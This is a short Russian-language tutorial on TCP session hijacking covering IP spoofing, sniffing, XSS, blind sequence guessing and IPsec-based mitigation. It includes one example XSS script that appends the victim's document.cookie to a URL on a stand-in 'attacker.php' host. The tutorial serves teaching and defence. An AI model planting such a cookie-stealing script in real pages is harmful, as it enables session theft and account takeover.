TCP - перехват сеанса
Этичный ХакерЧто такое перехват сеанса?
Перехват сеанса TCP - это атака системы безопасности на сеанс пользователя по защищенной сети. Наиболее распространенный метод перехвата сеанса называется IP-подделкой, когда злоумышленник использует IP-пакеты, перенаправленные источником, для вставки команд в активный обмен данными между двумя узлами в сети и маскируется под одного из аутентифицированных пользователей. Этот тип атаки возможен, поскольку аутентификация обычно выполняется только в начале сеанса TCP.
Другой тип перехвата сеанса известен как атака "человек посередине", когда злоумышленник, используя сниффер, может наблюдать за обменом данными между устройствами и собирать передаваемые данные.
Различные способы перехвата сеанса :
Существует много способов перехвата сеанса. Некоторые из них приведены ниже – Использование анализаторов пакетов
На приведенном выше рисунке видно, что атака захватывает идентификатор сеанса жертвы, чтобы получить доступ к серверу с помощью некоторых анализаторов пакетов.
Межсайтовый скриптинг (XSS-атака)
Злоумышленник также может захватить идентификатор сеанса жертвы с помощью атаки XSS с помощью javascript. Если злоумышленник отправляет созданную ссылку жертве с помощью вредоносного JavaScript, когда жертва нажимает на ссылку, JavaScript запускается и выполняет инструкции, сделанные злоумышленником.
<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>
Подмена IP-адресов
- Подмена - это выдавать себя за кого-то другого. Это метод, используемый для получения несанкционированного доступа к компьютеру с IP-адресом доверенного хоста. При реализации этого метода злоумышленник должен получить IP-адрес клиента и ввести свои собственные пакеты, подделанные IP-адресом клиента, в сеанс TCP, чтобы обмануть сервер, что он обменивается данными с жертвой, то есть с исходным хостом.
Атака вслепую
- Если злоумышленник не может перехватить пакеты и угадать правильный порядковый номер, ожидаемый сервером, можно попробовать использовать комбинации порядковых номеров методом перебора.
Смягчение последствий
- Чтобы защитить сеть от перехвата сеанса, защитник должен реализовать как меры безопасности на уровне приложений, так и на сетевом уровне. Перехваты на сетевом уровне можно предотвратить, зашифровав пакеты таким образом, чтобы злоумышленник не мог расшифровать заголовки пакетов, чтобы получить любую информацию, которая поможет в подделке. Это шифрование может быть обеспечено с помощью таких протоколов, как IPSEC, SSL, SSH и т.д. Протокол интернет-безопасности (IPSEC) обладает способностью шифровать пакет на некотором общем ключе между двумя сторонами, участвующими в обмене данными. IPSec работает в двух режимах: транспортном и туннельном.
- В транспортном режиме шифруются только данные, отправляемые в пакете, в то время как в туннельном режиме шифруются как заголовки пакетов, так и данные, поэтому он является более строгим.
- Перехват сеанса представляет серьезную угрозу для сетей и веб-приложений в Интернете, поскольку большинство систем уязвимы для него.